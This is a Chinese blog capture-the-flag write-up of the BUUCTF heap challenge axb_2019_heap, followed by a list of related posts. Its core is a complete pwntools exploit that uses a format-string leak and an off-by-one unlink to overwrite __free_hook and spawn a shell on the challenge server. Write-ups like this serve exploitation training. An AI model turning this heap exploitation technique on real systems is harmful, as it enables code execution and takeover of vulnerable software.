axb_2019_heap

最新推荐文章于 2024-02-20 00:57:52 发布
最新推荐文章于 2024-02-20 00:57:52 发布
阅读量682 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122601593
版权

axb_2019_heap

查看保护
请添加图片描述
请添加图片描述
在get_input这个函数里有一个off-by-one
请添加图片描述
size大小>0x80
请添加图片描述
字符串格式化溢出
利用字符串格式化溢出,泄漏程序地址和libc,因为有一个off-by-one,这里采用unlink,因为程序会创建全局变量note来放入指针和size,unlink到这里改指针为hook,改hook为one_gadget即可。具体unlink手法见z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27450)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '>> '

def add(index, size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Enter the index you want to create (0-10):', str(index))
    r.sendlineafter('Enter a size:', str(size))
    r.sendlineafter('Enter the content: ', content)

def edit(index, content):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Enter an index:', str(index))
    r.sendlineafter('Enter the content: ', content)

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Enter an index:', str(index))

offest = 7

p1 = '%11$p%15$p'
r.sendlineafter('Enter your name: ', p1) 

r.recvuntil('0x')
base_addr = int(r.recv(12), 16) - 0x1186
success('base_addr = ' + hex(base_addr))

libc = ELF('./libc-2.23.so')
libc_base = int(r.recv(14), 16) - libc.sym['__libc_start_main'] - 240
success('libc_base = ' + hex(libc_base))

one = [0x45216, 0x4526a, 0xf03a4]
one_gadget = one[1] + libc_base
success('one_gadget = ' + hex(one_gadget))
free_hook = libc_base + libc.sym['__free_hook']

bss_addr = base_addr + 0x202060

add(0, 0x98, 'aaaa')    #0
add(1, 0x90, 'bbbb')    #1
add(2, 0x90, 'cccc')    #2


fd = bss_addr - 0x18
bk = bss_addr - 0x10

p1 = p64(0) + p64(0x91) + p64(fd) + p64(bk) + p64(0) * 14 + p64(0x90) + b'\xa0'
edit(0, p1)
delete(1)

p2 = p64(0) * 3 + p64(free_hook) + p64(0x10)
edit(0, p2)

edit(0, p64(one_gadget))

delete(2)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Pwn2019安洵杯线上赛 Heap
Nothing
12-01 451
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
讨论课5答案_9020055601
08-03
10. **矩阵方程的解**:矩阵方程`AXB = C`的解`X`要求`B`的列向量可以用`A`的列向量线性表示。如果`A`和`B`的列向量线性相关,那么`X`可能存在。 通过这些知识点的学习,我们可以深入理解线性代数的核心概念,这...
axb_2019_heap详解
像初雪一样自由洒落
04-25 594
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1593
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
福建省平和南靖等五校2018_2019学年高二生物上学期第一次联考试题.doc
11-30
丁图表示果蝇的性别决定,配子基因型可能为AXBaXB、AY、aY。 12. **种群数量动态**:图12展示了肺炎双球菌在液体培养基中的种群数量变化,可能涉及到种群增长模型,如逻辑斯谛增长模型或指数增长模型,其中S形...
Asm.rar_SUM
09-21
从提供的文件名"A+B.ASM"、"AxB+C.ASM"和"AxB.ASM"来看,我们可以推测这些程序分别实现了两个数相加、两个数相乘以及可能的乘加运算。 在计算机科学中,汇编语言是一种低级编程语言,它与机器语言密切相关,但比...
漫画阅读工具axb.zip
07-16
axb漫画阅读工具:一款开源的漫画浏览神器》 在数字阅读日益普及的时代,漫画爱好者们对于便捷、高效的阅读工具需求越来越高。"axb漫画阅读工具"正是这样一款专为漫画迷量身打造的应用,它不仅能够处理各种常见的...
idm222-axb24
02-27
idm222-axb24 ##项目说明An Bui的投资组合网站。 包括主页,关于页面,联系页面和单个项目页面。 还包括简历页面。 ## Portfolio项目列表项目最多包含7个项目,以后可能会添加或改进项目。 这些包括: 恩托虫子小吃...
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 781
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1264
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
最新发布
2301_79326813的博客
02-20 508
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 186
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
AXB
weixin_30580341的博客
01-21 642
大数相乘 sum中,高位在前,所以两个乘数必须先转换一下,即末位在前,依此类推。 View Code 1 #include<stdio.h> 2 #include<string.h> 3 const int maxn = 505; 4 char a[ maxn ],b[ maxn ]; 5 int sum[ maxn*2 ]; 6...
shanghai2019_boringheap
doudoudedi
02-18 354
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
axb_2019_fmt32
、moddemod
07-19 836
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
cmcc_simplerop
doudoudedi
02-20 1029
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 702
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
pwn unlink
doudoudedi
12-11 411
unlink需要gobal变量然后可以写入多次,全局变量在heap上面 unlink的宏 p->fd=FD p->bk=BK if p->fd->bk!=p || p-bk-fd!=p worry else FD->bk=BK &p-0x18 BK->fd=FD &p-0x10 如上可以绕过检查result:&p=&p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值